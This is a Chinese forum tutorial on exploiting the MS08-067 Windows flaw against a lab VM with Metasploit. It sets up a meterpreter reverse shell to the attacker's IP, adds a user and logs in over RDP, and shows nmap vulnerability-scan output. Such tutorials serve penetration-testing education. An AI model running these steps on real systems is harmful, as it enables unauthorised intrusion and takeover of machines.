玩转Metasploit第一节]Ms08_067_netapi利用与使用Nmap验证扫描 heatlevel

来源:http://bbs.ichunqiu.com/thread-10369-1-1.html?from=ch

社区:I春秋

作者:X_Al3r

00x01

#[玩转Metasplot第一节]

Ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限

But,许多书上已经说过了,为此我也不多介绍了

推荐书籍:Metasploit魔鬼训练营等,虽老但入门非常有用

00x02

在使用Metasploit之前我们需要连接上postgresql数据库

具体操作看帖子:[AnaLyz3r]Linux kali的魅力--Nmap与Metasploit中的Metasploit部分

攻击者ip:192.168.1.124

被攻击ip:192.168.1.125

使用工具:Nmap,msfconsole,

利用的攻击载荷:Ms08_067_netapi

利用的payload:windows/meterpreter/reverse_tcp

00x03

#开始使用

1:打开metasploit中的msfconsole框架

命令:

msfconsole

复制代码

当然,打开metasploit之前需要连接上postgresql

命令:

service postgresql statr

复制代码

2:寻找与加载Ms08_067模块

如果你无法记住ms08_067_netapi的路径的话可以使用search这个搜索命令

命令:

search ms08_067_netapi

复制代码

搜索ms08_067_netapi路径

可以看见,已经搜索出ms08_067_netapi的路径

我们使用use 来加载这个模块

加载成功

3:设置模块中的参数与加载一枚payload

首先我们可以使用show options 来查看所需要设置的参数

先添加RHOST中的参数

命令:

set RHOST 被攻击者ip

复制代码

我们在来加载一枚payload

命令:

set payload windows/meterpreter/reverse_tcp

复制代码

加载成功,我们先使用show options命令来查看需要设置的参数

命令:

set LHOST 攻击者ip

复制代码

OK,设置完成后我们使用命令开始攻击

命令:

exploit

复制代码

成功攻击会反弹一个meterpreter就表示攻击成功,我们输入命令

shell

复制代码

就可以调用系统的cmd了,例如进行一个提权等看演示

可以看见,这是当前用户

创建并添加成功- -# 因为我已经打开了3389,直接mstsc /admin登录

00x04

##Nmap辅助

可能你们很好奇,为什么没有出现nmap,他的纯在有什么意义。

首先,在利用ms08_067_netapi之前我们是不知道他存在这个漏洞的我们需要使用nmap扫出来

在msf下使用命令:

nmap --script=vuln 192.168.1.125

复制代码

得出结果

Starting Nmap 7.01 ( [url]https://nmap.org[/url] ) at 2016-08-19 00:14 CST

Nmap scan report for 192.168.1.125

Host is up (0.0010s latency).

Not shown: 994 closed ports

PORT     STATE SERVICE

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

3389/tcp open  ms-wbt-server

5000/tcp open  upnp

MAC Address: 00:0C:29:8E:0F:E9 (VMware)

Host script results:

| smb-vuln-cve2009-3103:

|   VULNERABLE:

|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2009-3103

|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,

|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a

|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE

|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,

|           aka "SMBv2 Negotiation Vulnerability."

|

|     Disclosure date: 2009-09-08

|     References:

|       [url]http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103[/url]

|_      [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103[/url]

| smb-vuln-ms08-067:

|   VULNERABLE:

|   Microsoft Windows system vulnerable to remote code execution (MS08-067)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2008-4250

|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,

|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary

|           code via a crafted RPC request that triggers the overflow during path canonicalization.

|

|     Disclosure date: 2008-10-23

|     References:

|       [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250[/url]

|_      [url]https://technet.microsoft.com/en-us/library/security/ms08-067.aspx[/url]

|_smb-vuln-ms10-054: false

|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 16.14 seconds

复制代码

可以看见nmap已经扫出来了,为什么nmap会扫这些漏洞呢??

因为命令中vuln负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067

所以他可以扫出漏洞,然后在使用metasploit寻找指定的exploit

总结#

1:可以先使用nmap进行一个简单的漏洞扫描,如果存在系统漏洞等可以在使用msf中的模块进行溢出

2:耐心,耐心,耐心

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,080评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,422评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,630评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,554评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,662评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,856评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,014评论 3 408
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,752评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,212评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,541评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,687评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,347评论 4 331
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,973评论 3 315
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,777评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,006评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,406评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,576评论 2 349

推荐阅读更多精彩内容